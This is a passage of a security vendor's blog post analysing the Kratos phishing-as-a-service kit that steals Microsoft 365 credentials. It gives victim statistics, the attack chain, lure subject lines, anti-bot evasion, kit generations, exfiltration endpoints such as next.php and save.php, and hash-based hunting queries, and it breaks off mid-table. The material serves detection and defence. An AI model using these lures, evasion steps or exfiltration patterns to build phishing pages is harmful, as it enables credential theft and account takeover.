					<description><![CDATA[<p>Kratos is a mature Phishing-as-a-Service operation targeting Microsoft 365 users across the US, Europe, and other regions. By combining trusted platforms, anti-bot checks, and convincing login pages, ithelps attackers steal credentials while delaying detection and response. For security leaders, that increases the risk of account takeover, fraud, data exposure, and higher incident response costs. ANY.RUN [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/kratos-phaas-account-takeover/">​​Kratos PhaaS Targets US and EU: How to Reduce Microsoft 365 Account Takeover Risk​</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Kratos is a mature Phishing-as-a-Service operation targeting Microsoft 365 users across the US, Europe, and other regions. By combining trusted platforms, anti-bot checks, and convincing login pages, ithelps attackers steal credentials while delaying detection and response. For security leaders, that increases the risk of account takeover, fraud, data exposure, and higher incident response costs.</p>



<p class="wp-block-paragraph">ANY.RUN researchers traced three generations of the kit, uncovered 1,484 previously unattributed detonations, and mapped its infrastructure, operator panel, and victim patterns. This article gives security teams practical fingerprints, exfiltration indicators, SIEM scoring rules, and response guidance to reduce exposure, speed up investigations, and make faster decisions when Kratos activity appears.</p>



<h2 class="wp-block-heading">Key Takeaways</h2>



<ul class="wp-block-list">
<li><strong>Kratos is a turnkey phishing kit</strong> built to steal Microsoft 365 credentials and sold through a subscription model. Operator-side intelligence, including its admin panel and automated deployment features, shows that it operates as a full Phishing-as-a-Service (PhaaS) platform.</li>



<li><strong>ANY.RUN researchers&nbsp;identified&nbsp;1,628&nbsp;</strong><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>sandbox&nbsp;sessions</strong></a><strong>&nbsp;across the two main Kratos generations.</strong>&nbsp;Only 156 had been manually tagged as Kratos, while 1,484 had not yet been attributed to the family. An earlier V0 branch adds another nine sessions.&nbsp;&nbsp;</li>



<li><strong>Kratos targets organizations across more than 20 countries, including the US.</strong> This research identified 148 suspected victim organizations, with a particularly strong concentration in US, Spain and Southern Europe.</li>



<li><strong>ANY.RUN was already detecting the malicious activity&nbsp;through generic phishing-kit signatures.</strong>&nbsp;The new technical fingerprint added family-level attribution, making it possible to track&nbsp;Kratos&nbsp;activity, run retrospective hunts, and build a clearer view of the wider operation.&nbsp;</li>



<li><strong>Two page assets became the key hunting indicator:</strong> barr.svg and lg.svg. They almost always appear together and are rarely seen separately. This single fingerprint provides 90% recall with a false-positive rate close to zero.</li>



<li><strong>Kratos has evolved through three page generations:</strong> V0, V1, and V2. Each uses different exfiltration code, and the kit continues to develop.</li>



<li><strong>Kratos has been visible in the ANY.RUN sandbox since January 2026.</strong> External data suggests that its operator panel has been active since September 2025.</li>



<li><strong>Operator-side OSINT uncovered an active Kratos admin panel.</strong> The service allows operators to deploy phishing domains in a few clicks, configure Telegram or email delivery, apply geographic restrictions, and choose between several anti-bot systems.</li>
</ul>



<h2 class="wp-block-heading">Victimology: Kratos Targeting US and European Organizations&nbsp;</h2>



<p class="wp-block-paragraph">Microsoft 365 is the main brand impersonated by Kratos. In total, 1,365 sandbox tasks led to login.live.com or microsoftonline.com, while 412 were classified as <strong>“Fake Microsoft Authentication Page”</strong>incidents.</p>



<p class="wp-block-paragraph">Previous&nbsp;public&nbsp;research&nbsp;has&nbsp;documented&nbsp;Kratos&nbsp;activity&nbsp;across&nbsp;more&nbsp;than&nbsp;20&nbsp;countries,&nbsp;with&nbsp;around&nbsp;33%&nbsp;of&nbsp;observed&nbsp;targeting&nbsp;linked&nbsp;to&nbsp;the&nbsp;United&nbsp;States.&nbsp;This&nbsp;confirms&nbsp;that&nbsp;the&nbsp;service&nbsp;has&nbsp;a&nbsp;broadinternational&nbsp;reach&nbsp;and&nbsp;poses&nbsp;a&nbsp;direct&nbsp;risk&nbsp;to&nbsp;US&nbsp;organizations.&nbsp;</p>



<p class="wp-block-paragraph">TI&nbsp;Lookup&nbsp;query:&nbsp;<a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22kratos%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener"><strong>threatName:&#8221;kratos&#8221;</strong></a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="384" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-with-TI-Lookup-1024x384.png" alt="TI Lookup showing all the data related to Kratos attacks for deeper analysis" class="wp-image-22333" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-with-TI-Lookup-1024x384.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-with-TI-Lookup-300x113.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-with-TI-Lookup-768x288.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-with-TI-Lookup-1536x576.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-with-TI-Lookup-2048x768.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-with-TI-Lookup-370x139.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-with-TI-Lookup-270x101.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-with-TI-Lookup-740x278.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup showing all the data related to Kratos attacks for deeper analysis</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">ANY.RUN data adds a more detailed view of activity in Europe. We&nbsp;identified&nbsp;148 suspected victim organizations based on SharePoint tenant names found in phishing lures. The targeting appears opportunistic and spans a wide range of sectors, including SMBs, law firms, schools, polytechnic institutions, industrial organizations, and others.&nbsp;</p>



<p class="wp-block-paragraph">The strongest concentration in our dataset was in Southern Europe, particularly Spain. This assessment is based on the ccTLDs of suspected victim organizations, the language used on phishing pages, and the brands and services impersonated by attackers.</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-342"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="8"
           data-wpID="342"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Region                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Sessions                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Spain (.es, .cat, .eus)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        171                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        International TLDs (.com, .org, .net)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        ~162                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        France                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        31                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Sweden                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        15                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Austria                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        11                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Portugal                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        10                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Italy, Germany, Norway, Slovenia, and Belgium                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        4–5 each                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-342'>
table#wpdtSimpleTable-342{ table-layout: fixed !important; }
table#wpdtSimpleTable-342 td, table.wpdtSimpleTable342 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">This geographic pattern does not suggest that Kratos is limited to Europe. Instead, it indicates that some affiliates represented in the sandbox data appear to specialize in Spain and Southern Europe. Spanish-language tokens found in URL paths, including factura, abogados, and dgt, provide further evidence of this regional focus.</p>



<h3 class="wp-block-heading">How&nbsp;Kratos&nbsp;Turns&nbsp;Account&nbsp;Compromise&nbsp;into&nbsp;Business Risk&nbsp;</h3>



<p class="wp-block-paragraph">A&nbsp;stolen&nbsp;Microsoft 365&nbsp;account&nbsp;can&nbsp;give&nbsp;attackers&nbsp;more&nbsp;than&nbsp;access&nbsp;to&nbsp;one&nbsp;inbox. It&nbsp;can&nbsp;create&nbsp;a&nbsp;trusted&nbsp;route&nbsp;into&nbsp;company&nbsp;data,&nbsp;financial&nbsp;processes,&nbsp;and&nbsp;relationships&nbsp;with&nbsp;employees,&nbsp;customers,&nbsp;and suppliers.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-email-1024x578.webp" alt="Kratos phishing email targeting employees" class="wp-image-22334" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-email-1024x578.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-email-300x169.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-email-768x434.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-email-370x209.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-email-270x152.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-email-740x418.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-analysis-phishing-email.webp 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing email targeting company employees</em></figcaption></figure>
</div>


<ul class="wp-block-list">
<li><strong>Trusted-account&nbsp;abuse:</strong>&nbsp;Attackers&nbsp;can&nbsp;impersonate&nbsp;employees&nbsp;and&nbsp;use&nbsp;a&nbsp;legitimate&nbsp;mailbox&nbsp;to&nbsp;make&nbsp;fraudulent&nbsp;requests&nbsp;appear&nbsp;credible.&nbsp;</li>



<li><strong>Financial fraud:</strong> Access to invoices and payment conversations can support BEC, payment redirection, and supplier fraud.</li>



<li><strong>Data and partner exposure:</strong> Corporate email, SharePoint, and OneDrive may contain sensitive business data and information about third parties.</li>



<li><strong>Longer, costlier response:</strong> If attackers gain session access, changing the password alone may not remove them, increasing containment time and recovery costs.</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Detect account compromise before it leads to data exposure.</span><br>
Speed up investigations and contain Microsoft 365 threats. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=kratos-phaas-account-takeover&#038;utm_term=140726&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Cut Account Compromise Risk </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">How Kratos Attack Works: From Phishing Email to Stolen Password</h2>



<p class="wp-block-paragraph">Kratos&nbsp;rarely&nbsp;targets&nbsp;victims&nbsp;directly. The&nbsp;attack&nbsp;chain&nbsp;typically&nbsp;works&nbsp;as&nbsp;follows:&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="709" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies-1024x709.png" alt="Kratos phishing attack chain targeting US and EU companies" class="wp-image-22336" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies-1024x709.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies-300x208.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies-768x532.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies-1536x1064.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies-370x256.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies-270x187.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies-435x300.png 435w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies-740x512.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-Phishing-Attacks-US-and-EU-Companies.png 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<ol start="1" class="wp-block-list">
<li><strong>Phishing email → often passes through corporate email filters</strong> <br>In 114 analysis sessions, the emails had already passed through corporate email filters or secure email gateways before being submitted to the sandbox.</li>
</ol>



<p class="wp-block-paragraph">Common&nbsp;subject&nbsp;lines&nbsp;include:&nbsp;</p>



<ul start="1" class="wp-block-list">
<li>“User N&nbsp;has&nbsp;shared&nbsp;a&nbsp;document&nbsp;with&nbsp;you”&nbsp;</li>



<li>“Sign&nbsp;the&nbsp;document&nbsp;via&nbsp;DocuSign”&nbsp;</li>



<li>“An&nbsp;invoice&nbsp;has&nbsp;been&nbsp;sent”&nbsp;</li>
</ul>



<ol start="2" class="wp-block-list">
<li><strong>Trust-building&nbsp;lure: a&nbsp;link&nbsp;to&nbsp;a&nbsp;legitimate&nbsp;service</strong>&nbsp;</li>
</ol>



<ul start="1" class="wp-block-list">
<li>Microsoft SharePoint&nbsp;or&nbsp;OneDrive,&nbsp;the&nbsp;main&nbsp;delivery&nbsp;vector&nbsp;observed&nbsp;in&nbsp;351&nbsp;tasks&nbsp;</li>



<li>Canva,&nbsp;Tilda, systeme.io,&nbsp;and&nbsp;Microsoft&nbsp;Forms&nbsp;used&nbsp;as&nbsp;intermediary&nbsp;pages&nbsp;</li>



<li>Legitimate&nbsp;file-sharing&nbsp;services&nbsp;hosting&nbsp;phishing&nbsp;PDFs&nbsp;</li>
</ul>



<ol start="3" class="wp-block-list">
<li><strong>Redirect&nbsp;to&nbsp;a&nbsp;Kratos&nbsp;phishing&nbsp;page</strong>&nbsp;</li>
</ol>



<ol start="4" class="wp-block-list">
<li><strong>Cloudflare&nbsp;Turnstile&nbsp;verification</strong>&nbsp;<br>Victims&nbsp;are&nbsp;asked&nbsp;to&nbsp;prove&nbsp;that&nbsp;they&nbsp;are&nbsp;not&nbsp;bots.&nbsp;This&nbsp;step&nbsp;helps&nbsp;filter&nbsp;out&nbsp;sandboxes&nbsp;and&nbsp;automated&nbsp;scanners.&nbsp;</li>
</ol>



<ol start="5" class="wp-block-list">
<li><strong>Fake&nbsp;Microsoft 365&nbsp;login&nbsp;page</strong>&nbsp;<br>Before&nbsp;the&nbsp;login&nbsp;form&nbsp;appears,&nbsp;the&nbsp;victim&nbsp;sees&nbsp;Kratos’s&nbsp;distinctive&nbsp;animated&nbsp;envelope&nbsp;screen&nbsp;with&nbsp;the&nbsp;message&nbsp;“Loading&nbsp;in&nbsp;progress…”&nbsp;</li>
</ol>



<ol start="6" class="wp-block-list">
<li><strong>Credential&nbsp;theft&nbsp;→ POST&nbsp;request&nbsp;to&nbsp;a PHP&nbsp;endpoint</strong>&nbsp;</li>
</ol>



<ul start="1" class="wp-block-list">
<li>V1:&nbsp;next.php&nbsp;</li>



<li>V2:&nbsp;save.php&nbsp;</li>



<li>V0: /PTT/SOft/mini.php&nbsp;</li>
</ul>



<p class="wp-block-paragraph">Some sessions also establish a WebSocket connection. This may indicate possible adversary-in-the-middle activity or live credential relaying, but a WebSocket connection alone does not prove sessiontheft.</p>



<p class="wp-block-paragraph">One visual detail makes Kratos particularly recognizable: before displaying the login form, the page shows an animated envelope with the message <strong>“Loading in progress…”</strong> over a blurred invoice ordocument. The browser tab is also almost always titled <strong>Authentication</strong>.</p>



<p class="wp-block-paragraph">These details may seem minor, but together they form a consistent and reliable fingerprint.</p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/4d72c3ad-972e-4eae-a950-02ff51576637?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check&nbsp;Kratos&nbsp;phishing&nbsp;attack&nbsp;and&nbsp;get&nbsp;relevant IOCs</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="566" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-sandbox-analysis-1024x566.webp" alt="Full attack chain of Kratos analyzed inside ANY.RUN sandbox in just 1 min" class="wp-image-22337" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-sandbox-analysis-1024x566.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-sandbox-analysis-300x166.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-sandbox-analysis-768x425.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-sandbox-analysis-1536x849.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-sandbox-analysis-370x205.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-sandbox-analysis-270x149.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-sandbox-analysis-740x409.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-sandbox-analysis.webp 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Full attack chain of Kratos analyzed inside ANY.RUN sandbox in just 1 min</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The victim is given only three attempts to enter a password. After that, they are either redirected to a predefined URL, office.com in V1, or shown an “incorrect password” message.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="555" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/ANY.RUN-in-browser-data-investigation--1024x555.webp" alt="" class="wp-image-22338" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/ANY.RUN-in-browser-data-investigation--1024x555.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/ANY.RUN-in-browser-data-investigation--300x163.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/ANY.RUN-in-browser-data-investigation--768x416.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/ANY.RUN-in-browser-data-investigation--1536x832.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/ANY.RUN-in-browser-data-investigation--370x201.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/ANY.RUN-in-browser-data-investigation--270x146.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/ANY.RUN-in-browser-data-investigation--740x401.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/ANY.RUN-in-browser-data-investigation-.webp 1967w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN’s in-browser data investigation showing browser-level execution</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">ANY.RUN’s&nbsp;<strong>in-browser data investigation</strong>&nbsp;reveals this logic directly in the page code. Analysts can see the&nbsp;submitData() function sending the di and pr values to&nbsp;next.php, the redirect to office.com, and the handling of the #pass-err element. This confirms that the behavior is intentional and designed to filter out invalid or random submissions.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Expose hidden phishing behavior and confirm threats faster. </span><br>
Reduce investigation time and account takeover risk.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Reduce Phishing Exposure </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Evolution:&nbsp;Three&nbsp;Generations&nbsp;of&nbsp;Kratos&nbsp;</h2>



<p class="wp-block-paragraph">Kratos is not a static phishing kit. Based on public industry reports and ANY.RUN research, we identified three generations of its phishing pages. Each can be recognized by a distinct set of files and, more importantly, by its own exfiltration code:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-343"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="5"
           data-rows="4"
           data-wpID="343"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:20%;                    padding:10px;
                    "
                    >
                                        Generation                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:20%;                    padding:10px;
                    "
                    >
                                        How to Identify It                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:20%;                    padding:10px;
                    "
                    >
                                        Exfiltration Code                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:20%;                    padding:10px;
                    "
                    >
                                        Sessions                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="E1"
                    data-col-index="4"
                    data-row-index="0"
                    style=" width:20%;                    padding:10px;
                    "
                    >
                                        Example                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        V0: PTT/SOft                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        URLs containing */PTT/SOft/; associated domain: dwbud.vilaribit.com; “Secure File Access” page asking the victim to verify their email over a blurred invoice                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        sendDataToPHP()→ POST to mini.php inside /PTT/SOft/                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        9                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="E2"
                    data-col-index="4"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        TI Lookup query: SHA256:"c447e75f1029ed7a5882add16bcd13ad44be3bd47c93c830ff39185e23d25ebb" AND SHA256:"cd231b895bbcd7154b81df1e065bf02f1ec667b920c8b6d23308cd509833b5ea"                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        V1: Dominant generation                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        barr.svg + lg.svg + ani.gif + res.css + styles.css; direct imitation of the Microsoft Sign In page                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        submitData() → next.php, with variants including nex.php, n3xt.php, and officers*eur.php                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        1,397                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="E3"
                    data-col-index="4"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        TI Lookup query: SHA256:"c447e75f1029ed7a5882add16bcd13ad44be3bd47c93c830ff39185e23d25ebb" AND SHA256:"cd231b895bbcd7154b81df1e065bf02f1ec667b920c8b6d23308cd509833b5ea"                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        V2                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        dsa.svg + sid.gif + imag.jpg + main.js; uses jQuery 4.0 beta; code is obfuscated                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Deobfuscatedmain.js → fetch("save.php")                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        231                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="E4"
                    data-col-index="4"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
